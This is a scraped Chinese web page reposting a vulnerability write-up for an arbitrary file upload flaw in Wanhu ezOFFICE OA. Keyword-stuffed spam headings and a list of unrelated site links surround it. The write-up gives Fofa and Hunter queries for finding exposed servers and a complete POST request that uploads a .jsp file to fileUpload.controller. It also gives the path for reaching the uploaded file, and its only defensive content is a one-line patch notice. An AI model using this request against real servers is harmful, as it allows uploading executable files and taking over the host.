当前位置: 首页 > news >正文

网站建设捌金手指花总二九网站建设要注意

网站建设捌金手指花总二九,网站建设要注意,公司网站建设多少费用济南兴田德润评价,建设电子商务网站需要什么0x01 产品描述#xff1a; 万户OA#xff08;Office Automation#xff09;是一款企业级协同办公管理软件#xff0c;旨在为企业提供全面的办公自动化解决方案。万户ezOFFICE存在任意文件上传漏洞。攻击者可以通过该远程下载任意文件到目标服务器#xff0c;导致攻击者可获…0x01 产品描述 万户OAOffice Automation是一款企业级协同办公管理软件旨在为企业提供全面的办公自动化解决方案。万户ezOFFICE存在任意文件上传漏洞。攻击者可以通过该远程下载任意文件到目标服务器导致攻击者可获取服务器控制权限。 0x02 漏洞描述 万户OA-ezOFFICE fileUpload.controller中存在一个 任意文件上传漏洞通过这个漏洞可以操纵任意文件的写入。这意味着不法分子可以利用这个漏洞来上传任意可执行性文件用于远程系统执行、数据获取、系统接管等严重威胁系统的安全性 0x03 搜索语句 Fofaapp万户ezOFFICE协同管理平台 || app万户网络-ezOFFICE Hunter: app.name万户 Ezoffice OA 0x04 漏洞复现 POST /defaultroot/upload/fileUpload.controller HTTP/1.1 Host: your-ip User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0 Accept-Encoding: gzip, deflate Accept: */* Connection: Keep-Alive Content-Type: multipart/form-data; boundaryKPmtcldVGtT3s8kux_aHDDZ4-A7wRsken5v0 Content-Length: 773--KPmtcldVGtT3s8kux_aHDDZ4-A7wRsken5v0 Content-Disposition: form-data; namefile; filename1.jsp Content-Type: application/octet-stream Content-Transfer-Encoding: binary12345 --KPmtcldVGtT3s8kux_aHDDZ4-A7wRsken5v0-- 上传成功后拼接下列接口进行访问  http://your-ip:port/defaultroot/upload/html/2024xxxxxxxxxxxxxx.jsp 0x05 修复建议 厂商已发布补丁请及时修复
http://www.w-s-a.com/news/648557/

相关文章:

  • 中山小榄网站建设长沙网络营销品牌排名
  • 推广优化厂商联系方式网站推广教程优化整站
  • 为外国企业做中文网站建设网站建设单位哪家好
  • 生物制药公司网站模板有没有专业做steam创客的网站
  • 福田做棋牌网站建设找哪家效益快弄一个微信小程序多少钱
  • 成都哪家做网站建设比较好做推广赚钱的网站
  • 常州专门做网站的公司有哪些网页模板下载网站10
  • linx服务器怎么做网站做长页网站
  • 汕头网站建设sagevis服装设计公司有什么职位
  • 网站流量分析报告医院网站制作公司
  • 仿58网站怎么做邯郸网站设计多少钱
  • 广州网站制作开发wordpress中文固定连接
  • 成都网站建设公司盈利吗专门做二手手机的网站有哪些
  • 手机网站设计需要学什么wordpress读法
  • WordPress pajx天津短视频seo
  • 检察院门户网站建设情况总结深圳网站制作长沙
  • 单页导航网站模板搜索量查询
  • 如何在一个地方建设网站营销型定制网站
  • 保定网站建设方案维护动易网站中添加邮箱
  • 简易网站的html代码wordpress音乐html
  • 四川住房和城乡建设厅网站打不开海山网站建设
  • 深圳设计功能网站如何用html制作网站
  • 网络优化软件下载竞价排名和seo的区别
  • 龙华新区做网站中高端网站建设
  • 网站开发小图标大全手机网站设计开发
  • 网页设计设计一个网站口碑营销的优点
  • 枣庄建网站的公司唐山企业网络推广培训
  • 张家界建设企业网站学校资源网站建设方案
  • 网站制作教程书籍业务管理系统
  • 上传网站空间的建站程序怎么删除c 网站开发案例详解下载